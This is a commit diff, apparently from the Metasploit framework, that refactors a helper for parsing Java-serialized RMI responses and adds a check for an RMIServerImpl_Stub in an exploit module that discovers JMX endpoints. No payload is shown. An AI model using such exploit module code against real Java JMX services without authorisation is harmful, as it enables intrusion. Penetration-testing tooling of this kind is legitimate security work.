Refactor extract_mbean_server
parent
4247747fc5
commit
3a3e37ba6c
|
@ -17,31 +17,7 @@ module Msf
|
||||||
stream
|
stream
|
||||||
end
|
end
|
||||||
|
|
||||||
def extract_mbean_server(stream)
|
def extract_mbean_server(block_data)
|
||||||
my_block = false
|
|
||||||
stub = false
|
|
||||||
i = 0
|
|
||||||
stub_index = 0
|
|
||||||
stream.contents.each do |content|
|
|
||||||
if content.class == Rex::Java::Serialization::Model::BlockData && i == 0
|
|
||||||
my_block = true
|
|
||||||
end
|
|
||||||
|
|
||||||
if content.class == Rex::Java::Serialization::Model::NewObject && content.class_desc.description.class_name.contents == 'javax.management.remote.rmi.RMIServerImpl_Stub'
|
|
||||||
stub = true
|
|
||||||
stub_index = i
|
|
||||||
break
|
|
||||||
end
|
|
||||||
i = i + 1
|
|
||||||
end
|
|
||||||
|
|
||||||
unless my_block && stub
|
|
||||||
return nil
|
|
||||||
end
|
|
||||||
|
|
||||||
my_block_id = stream.contents[0].contents[1..-1]
|
|
||||||
|
|
||||||
block_data = stream.contents[stub_index + 1]
|
|
||||||
data_io = StringIO.new(block_data.contents)
|
data_io = StringIO.new(block_data.contents)
|
||||||
|
|
||||||
ref_length = data_io.read(2)
|
ref_length = data_io.read(2)
|
||||||
|
|
|
@ -193,9 +193,22 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
fail_with("#{peer} - Failed to discover the JMX endpoint")
|
fail_with("#{peer} - Failed to discover the JMX endpoint")
|
||||||
end
|
end
|
||||||
|
|
||||||
|
answer = extract_object(return_data, 1)
|
||||||
|
|
||||||
|
if answer.nil?
|
||||||
|
fail_with(Failure::Unknown, "#{peer} - Unexpected JMXRMI discovery answer")
|
||||||
|
end
|
||||||
|
|
||||||
|
case answer
|
||||||
|
when 'javax.management.remote.rmi.RMIServerImpl_Stub'
|
||||||
|
print_good("#{peer} - RMIServerImpl_Stub instance found, using it")
|
||||||
|
else
|
||||||
|
fail_with(Failure::Unknown, "#{peer} - JMXRMI discovery returned unexpected object #{answer}")
|
||||||
|
end
|
||||||
|
|
||||||
print_status("#{peer} - Extracting MBean Server...")
|
print_status("#{peer} - Extracting MBean Server...")
|
||||||
|
|
||||||
mbean_server = extract_mbean_server(return_data)
|
mbean_server = extract_mbean_server(return_data.contents[2])
|
||||||
|
|
||||||
if mbean_server.nil?
|
if mbean_server.nil?
|
||||||
fail_with("#{peer} - Failed to extract the JMX MBean server endpoint")
|
fail_with("#{peer} - Failed to extract the JMX MBean server endpoint")
|
||||||
|
|
Loading…
Reference in New Issue